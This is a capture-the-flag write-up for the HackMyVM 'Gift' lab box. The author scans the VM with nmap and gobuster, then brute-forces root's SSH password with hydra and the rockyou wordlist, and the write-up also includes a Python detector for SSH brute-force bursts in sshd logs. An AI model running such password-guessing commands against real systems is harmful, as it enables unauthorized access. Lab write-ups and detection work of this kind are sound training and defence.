Penetration Testing HackMyVm.eu GIFT box

An extremely Easy box from Hackmyvm.eu

Fast Scan to get host

nmap -sn  192.168.56.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-12 13:07 EEST
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00014s latency).
MAC Address: 08:00:27:0C:16:CC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00034s latency).
MAC Address: 08:00:27:5B:62:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.00 seconds

Great, 192.168.56.102 is our VM IP.


sudo nmap -sS 192.168.56.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-12 13:07 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00014s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5B:62:78 (Oracle VirtualBox virtual NIC)

Going to http://192.168.56.102 results in a basic HTML page that says: "Dont Overthink. Really, Its simple."

Using gobuster didn’t quite result in any findings

gobuster dir --url 192.168.56.102 --wordlist /usr/share/wordlists/dirbuster/directory-list-1.0.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/09/12 13:11:36 Starting gobuster in directory enumeration mode
===============================================================
                                  
===============================================================
2023/09/12 13:11:54 Finished
===============================================================

My next idea was to try and do a further scan on more ports, or use another fuzzing tool (who knows?).. I was pretty puzzled; the only obvious thing to do was to use brute forcing for logging into SSH.

So I decided to try hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt.gz 192.168.56.102 ssh
....
[22][ssh] host: 192.168.56.102   login: root   password: simple
....

Ok, so it was indeed.. simple..
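
Seen from the server, a wordlist run like the one above shows up in the sshd log as a burst of failed root logins from one address followed by an accepted one. The following is an added example (not part of the original write-up) that flags that pattern; the log lines are constructed, and the OpenSSH message layout, ISO timestamps, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed OpenSSH message layout: "<iso-ts> <host> sshd[pid]: Failed password for root from IP port N ssh2"
EVENT = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Alert on sources with >= threshold failed logins inside window, and
    record the account if a password login then succeeds from that source."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    alerts = {}                   # src -> alert record
    for line in lines:
        m = EVENT.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        src, user = m["src"], m["user"]
        q = recent[src]
        while q and ts - q[0] > window:   # expire failures older than the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {"src": src, "failures": 0, "compromised": None})
                alert["failures"] = max(alert["failures"], len(q))
        elif src in alerts and q:
            # Accepted login right after a burst: treat the credential as guessed.
            alerts[src]["compromised"] = user
    return list(alerts.values())

# Constructed sample: six failures and a success from one host, plus a benign typo from another.
SAMPLE_LOG = [
    f"2023-09-12T13:20:{s:02d} gift sshd[{2200 + s}]: Failed password for root from 192.168.56.101 port {40000 + s} ssh2"
    for s in range(6)
] + [
    "2023-09-12T13:20:06 gift sshd[2206]: Accepted password for root from 192.168.56.101 port 40006 ssh2",
    "2023-09-12T13:25:10 gift sshd[2300]: Failed password for alice from 192.168.56.1 port 51000 ssh2",
    "2023-09-12T13:25:20 gift sshd[2301]: Accepted password for alice from 192.168.56.1 port 51001 ssh2",
]

if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```

The pattern stops paying off for an attacker once sshd_config sets PermitRootLogin and PasswordAuthentication to no, so only key-based logins to unprivileged accounts remain.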

ssh root@192.168.56.102

gift:~# ls
root.txt  user.txt

I’m not going to output the .txt files but.. it was indeed “simple”

It took more time to download and set up the VirtualBox environment than everything else.

This should have been something like the Bandit exercises from OverTheWire
